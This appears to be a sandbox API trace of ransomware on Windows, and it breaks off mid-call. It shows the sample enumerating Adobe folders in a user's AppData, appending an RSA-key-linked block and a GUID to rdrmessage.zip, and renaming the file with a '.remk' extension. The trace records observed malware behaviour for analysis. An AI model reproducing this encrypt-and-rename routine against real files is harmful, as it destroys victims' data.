PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x50) returned 0x31b5808 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf1c8 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a20 [0237.054] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.054] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.054] PathFindFileNameW (pszPath="") returned="" [0237.054] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.054] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.057] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd6e27e0, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe5b04330, ftLastAccessTime.dwHighDateTime=0x1d35d05, ftLastWriteTime.dwLowDateTime=0xe5b04330, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.057] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xd9b6a040, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xd9b6a040, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xde963ca0, ftLastWriteTime.dwHighDateTime=0x1d2e625, nFileSizeHigh=0x0, nFileSizeLow=0xa5ff, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="rdrmessage.zip", cAlternateFileName="RDRMES~1.ZIP")) returned 1 [0237.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.057] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0237.057] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip") returned=".zip" [0237.057] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.058] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=42495) returned 1 [0237.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.061] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa5d9, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.061] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.063] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.063] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0xa5ff, lpOverlapped=0x0) returned 1 [0237.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.066] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.066] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.066] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.067] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.067] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.067] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.067] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.067] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.067] GetLastError () returned 0x0 [0237.067] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.067] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.067] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.068] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.068] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.068] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.068] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.068] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0xa5ff, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.068] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.069] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.069] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.069] CloseHandle (hObject=0x640) returned 1 [0237.074] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xb0) returned 0x3185fa8 [0237.075] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8b0) returned 0x37bd408 [0237.075] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3185fa8 | out: hHeap=0x630000) returned 1 [0237.075] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\rdrmessage.zip.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\locallow\\adobe\\acrobat\\10.0\\rdrmessage.zip.remk")) returned 1 [0237.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.076] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.076] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.077] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0237.077] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xce824760, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xce824760, ftLastAccessTime.dwHighDateTime=0x1d2dda0, ftLastWriteTime.dwLowDateTime=0xe5ab8070, ftLastWriteTime.dwHighDateTime=0x1d35d05, nFileSizeHigh=0x0, nFileSizeLow=0x2000, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ReaderMessages", cAlternateFileName="READER~1")) returned 1 [0237.077] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x90) returned 0x65e7c8 [0237.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd6) returned 0x31658e8 [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e7c8 | out: hHeap=0x630000) returned 1 [0237.078] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Acrobat\\10.0\\ReaderMessages") returned="" [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31658e8 | out: hHeap=0x630000) returned 1 [0237.078] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 1 [0237.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b68b8 [0237.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1c) returned 0x31ed738 [0237.078] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b68b8 | out: hHeap=0x630000) returned 1 [0237.078] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8287550, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe8287550, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe8287550, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Search", cAlternateFileName="")) returned 0 [0237.078] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.078] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x65e860 | out: hHeap=0x630000) returned 1 [0237.079] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b68b8 [0237.079] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adfb74) returned 0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.079] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.079] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x37bfdb0 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bfdb0 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.080] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.080] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x37b5b70 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.081] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.081] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0237.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0237.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.082] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b66c0 [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0237.082] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0237.082] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed788 | out: hHeap=0x630000) returned 1 [0237.082] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0237.082] PathFindFileNameW (pszPath="") returned="" [0237.082] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\*", lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x31de130 [0237.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b66c0 | out: hHeap=0x630000) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xcd708940, ftCreationTime.dwHighDateTime=0x1d2dda0, ftLastAccessTime.dwLowDateTime=0xe82613f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe82613f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 1 [0237.087] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe82613f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec6bf330, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec6bf330, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Adobe Custom Dictionary", cAlternateFileName="ADOBEC~1")) returned 0 [0237.087] FindClose (in: hFindFile=0x31de130 | out: hFindFile=0x31de130) returned 1 [0237.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a20 | out: hHeap=0x630000) returned 1 [0237.087] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b68b8 | out: hHeap=0x630000) returned 1 [0237.087] PeekMessageW (in: lpMsg=0x3adff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x3adff08) returned 0 [0237.087] PeekMessageW (in: lpMsg=0x3adfb74, hWnd=0x0, 